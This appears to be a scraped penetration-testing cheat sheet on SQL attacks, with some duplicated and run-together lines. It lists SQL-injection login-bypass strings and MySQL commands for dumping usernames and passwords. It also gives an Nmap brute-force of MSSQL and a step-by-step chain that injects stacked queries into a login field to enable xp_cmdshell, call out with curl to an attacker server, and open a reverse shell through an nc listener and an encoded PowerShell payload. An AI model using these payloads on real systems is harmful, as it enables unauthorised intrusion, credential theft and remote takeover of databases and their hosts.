SQL
Login Bypasses
' OR 1=1' --
' or 1=1 --
' OR '' = '
admin' -- //
admin' or 'MySQL
PostgreSQL
MSSQL
Enumerate
Last updated
' OR 1=1' --
' or 1=1 --
' OR '' = '
admin' -- //
admin' or 'Last updated
# Service
systemctl status mysql # Check if running + errors
systemctl restart mysql # Restart after changes/crash
# Connect
mysql -u nurhodelta -p # Other user login
mysql -u root -p PHPgal # Login + select DB
# Basic
SHOW DATABASES; # List all databases
USE employee_akpoly; # Switch to a DB
SHOW TABLES; # List tables in current DB
DESCRIBE tblemployee; # Show columns + types (or SHOW COLUMNS FROM tblemployee;)
SELECT * FROM users; # Dump users table
SELECT * FROM tblemployee; # Common employee table
SELECT username, password FROM users; # Targeted creds dump
# Very useful extras (add when needed)
SELECT * FROM table_name LIMIT 5; # Safe preview
SELECT user, host FROM mysql.user; # MySQL accounts
# Backup and restore
Backup: mysqldump db_name > backup.sql
Restore: mysql db_name < backup.sql# Nmap scan
nmap -T4 -sV -p 5432,5433
# Connect
psql -h IP -U user -d databasenmap -n -v -sV -Pn -p 1433 -script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password
10.10.194.142
# Brute force
nmap -n -sV -Pn -p 1433 -script ms-sql-brute -script-args
userdb=users_ldap.txt,passdb=/usr/share/wordlists/rockyou.tx 10.10.194.142# Impacket
impacket-mssqlclient Administrator:[email protected] -windows-auth
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';
# Identify sleep 10sec
';waitfor delay '0:0:10'--
# Enable xp_cmdshell
UsernameTextBox=admin';EXEC sp_configure 'show advanced options', 1--+
UsernameTextBox=admin';RECONFIGURE--+
UsernameTextBox=admin';EXEC sp_configure 'xp_cmdshell', 1--+
UsernameTextBox=admin';RECONFIGURE--+
# Verify
Python -m http.server 80
UsernameTextBox=admin';EXEC xp_cmdshell 'curl http://192.168.45.227'--+&...
# RCE
rlwrap nc -lvnp 4444
UsernameTextBox=admin';EXEC xp_cmdshell 'powershell -e B64PAYLOAD=='&PasswordTextBox=...